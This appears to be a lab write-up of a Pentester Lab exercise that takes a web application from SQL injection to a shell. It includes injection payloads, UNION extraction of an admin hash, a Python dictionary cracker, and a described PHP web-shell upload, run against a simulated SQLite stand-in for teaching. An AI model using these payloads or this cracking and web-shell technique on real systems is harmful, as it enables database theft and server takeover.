SQLi to Shell - Pentester Lab Exercise
The exercise requires us to leverage SQL injection (SQLi) to gain shell access on a vulnerable web application.
A live image of a Unix-like operating system is provided; booting it and browsing to the machine's address gives us a simple website.
Fingerprinting
Fingerprinting refers to gathering information about the target system (software, versions, platform) before attacking it.
Examining the URLs in the web browser (pages end in .php) or inspecting the received HTTP headers reveals that the website was written in PHP.
On further investigation, the response headers to a plain HTTP GET request (typically Server and X-Powered-By) return the version of PHP running, the web server and its version, and the operating system.
Probing with OpenSSL (openssl s_client against port 443) returns nothing, indicating that the application is not available over HTTPS.
Detecting SQL Injection
From the target website, we can see a pattern of how pages are returned as shown in the snippet below.
/cat.php?id=n
The value n is an integer; a different page is returned depending on its value.
A simple test for SQLi is to replace n with an arithmetic expression, for example by requesting /cat.php?id=2-1. If the application builds its query by concatenating the parameter, the database receives the statement below:
SELECT * FROM articles WHERE id=2-1;
If the page returned is the one for id=1, the database evaluated the arithmetic, which means user input reaches the query unescaped. This is referred to as integer-based detection.
Alternatively, we can test for SQLi based on strings. This relies on the fact that SQL string literals are delimited by single quotes, so an unbalanced single quote breaks the query and produces an error.
A test for this type of vulnerability inserts a quote followed by a condition that is always true where the application expects a value (for example ' OR '1'='1 in a name field).
As an example, the resulting statement below returns every row of the table. This is because the condition '1'='1' is always true, so the WHERE clause matches every row.
SELECT * FROM users WHERE name = '' OR '1'='1';
Exploitation
Based on the results of the detection stage, we have confirmed that an SQL injection exists in the web application.
Therefore our objective becomes the retrieval of additional information from within the database. To achieve this, the SQL UNION operator can be leveraged: it appends the rows of a second SELECT to the result of the original query, so it can return information stored in other tables. The injected SELECT must produce the same number of columns as the original query; that number is found by trial, for example with ORDER BY n for increasing n until the query errors, or with UNION SELECT and an increasing number of placeholder columns.
The result of this stage of the exercise is a username and hashed password for a privileged (administrator) account on the web application.
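The detection checks and the UNION extraction described above, as an added example that is not part of the original write-up or of Pentester Lab's code: a Python script that stands in for the vulnerable page with an in-memory SQLite database (the real lab uses MySQL) and builds its queries by string concatenation, exactly the defect the exercise targets. The table and column names (articles, users, login, password), the rows, the search_page endpoint and the stored hash are constructed assumptions for illustration.

```python
import sqlite3

# Added example, not Pentester Lab's code: an in-memory SQLite stand-in for the
# lab's MySQL database. Table and column names (articles, users, login,
# password) and every row are constructed assumptions for illustration.
def build_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE articles (id INTEGER, title TEXT, body TEXT);
        INSERT INTO articles VALUES (1, 'First article', 'hello');
        INSERT INTO articles VALUES (2, 'Second article', 'world');
        INSERT INTO articles VALUES (3, 'Third article', 'again');
        CREATE TABLE users (id INTEGER, login TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
    """)
    return db

DB = build_db()


def run(query, params=()):
    """Execute a query the way the page would; None means a SQL error
    (the vulnerable page would show an error or an empty page instead)."""
    try:
        return DB.execute(query, params).fetchall()
    except sqlite3.Error:
        return None


def cat_page(id_param):
    """Mimics /cat.php?id=...: the parameter is concatenated straight into SQL."""
    return run("SELECT id, title, body FROM articles WHERE id=" + id_param)


def cat_page_safe(id_param):
    """Hardened form: a parameterised query, so the input is a value, not SQL."""
    return run("SELECT id, title, body FROM articles WHERE id=?", (id_param,))


def search_page(title_param):
    """Mimics a string-context query (assumed endpoint), the second detection case."""
    return run("SELECT id, title, body FROM articles WHERE title='" + title_param + "'")


def integer_based_detection():
    """id=2-1 is evaluated by the database: if it yields the same page as id=1
    (and a different one from id=2), arithmetic reaches the query unescaped."""
    return cat_page("2-1") == cat_page("1") and cat_page("2-1") != cat_page("2")


def string_based_detection():
    """A lone quote breaks the query (error); ' OR '1'='1 returns every row."""
    broken = search_page("'") is None
    everything = search_page("' OR '1'='1") == run("SELECT id, title, body FROM articles")
    return broken and everything


def find_column_count(limit=10):
    """ORDER BY n errors once n exceeds the number of selected columns."""
    for n in range(1, limit + 1):
        if cat_page("1 ORDER BY %d" % n) is None:
            return n - 1
    return None


def dump_users():
    """id=0 matches no article, so only the UNIONed user rows come back.
    The injected SELECT must have the column count found above (3 here)."""
    if find_column_count() != 3:
        raise RuntimeError("this demo's UNION payload is written for three columns")
    rows = cat_page("0 UNION SELECT id, login, password FROM users")
    return [(login, pw_hash) for _id, login, pw_hash in rows]
```

cat_page and search_page are the vulnerable code: the parameter goes straight into the query text. With cat_page_safe the same inputs are bound as values, so 2-1 no longer matches article 1 and the quote payloads are just strings that match nothing. A UNION payload with the wrong number of columns is rejected by the database, which is why the column count has to be established first.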
Information gathered in the fingerprinting stage reveals that the backend database is MySQL, whose built-in MD5() and SHA1() functions are the usual way such applications hash passwords (unsalted, stored as hex). The length of the retrieved digest tells the two apart: 32 hex characters for MD5, 40 for SHA1.
With the algorithm identified, we can crack the hash using John the Ripper. Alternatively, an online search for the hash itself often returns hash lookup services or leaked dumps with the matching cleartext.
The recovered username and password should grant us elevated access to the web application.
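Identifying the hash and running the dictionary attack described above, as an added example that is not the write-up's code nor John the Ripper's: the retrieved hash (md5('password'), constructed for this example), the small wordlist and the mangling rules are assumptions; a real attack would use John with a large wordlist and its full rule set.

```python
import hashlib

# Added example, not Pentester Lab's code. The hash stands in for the digest
# pulled from the users table via the UNION injection; it is md5('password'),
# constructed for this demonstration.
RETRIEVED_HASH = "5f4dcc3b5aa765d61d8327deb882cf99"

# Unsalted hex digests are recognisable purely by their length.
HASH_LENGTHS = {32: "md5", 40: "sha1", 64: "sha256"}

# Constructed toy wordlist; a real run would use rockyou.txt or similar.
WORDLIST = ["letmein", "admin", "123456", "password", "qwerty"]


def identify_hash(digest):
    """Return the likely algorithm for a bare hex digest, or None if it is not
    a plain hex string of a known length (salted/encoded formats need other tools)."""
    digest = digest.strip().lower()
    if not digest or any(c not in "0123456789abcdef" for c in digest):
        return None
    return HASH_LENGTHS.get(len(digest))


def hash_word(algo, word):
    """Hash a candidate the way MySQL's MD5()/SHA1() would: hex digest, no salt."""
    return hashlib.new(algo, word.encode("utf-8")).hexdigest()


def candidates(wordlist):
    """A tiny John-style rule set: the word itself, capitalised, and with a
    single trailing digit appended."""
    for word in wordlist:
        yield word
        yield word.capitalize()
        for digit in "0123456789":
            yield word + digit


def crack(digest, wordlist):
    """Dictionary attack: hash every candidate with the identified algorithm and
    compare against the target. Returns the cleartext or None."""
    algo = identify_hash(digest)
    if algo is None:
        return None
    target = digest.strip().lower()
    for word in candidates(wordlist):
        if hash_word(algo, word) == target:
            return word
    return None


if __name__ == "__main__":
    print(identify_hash(RETRIEVED_HASH), crack(RETRIEVED_HASH, WORDLIST))
```

Because the digests are unsalted, every user with the same password has the same hash, which is also why a web search for the hex string so often succeeds: the value is already in public lookup tables.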
From the fingerprinting stage, we know that the web server is running Debian Squeeze (Debian 6).
Using this information, the objective becomes uploading a small PHP script (a web shell) through the application; the script passes a URL parameter to a system call, giving us access to the Bash shell. With the script uploaded, we can run Bash commands by requesting its URL with the command as a parameter, thus completing the exercise.
Conclusion
The exercise above is provided by Pentester Lab and can be attempted on their site.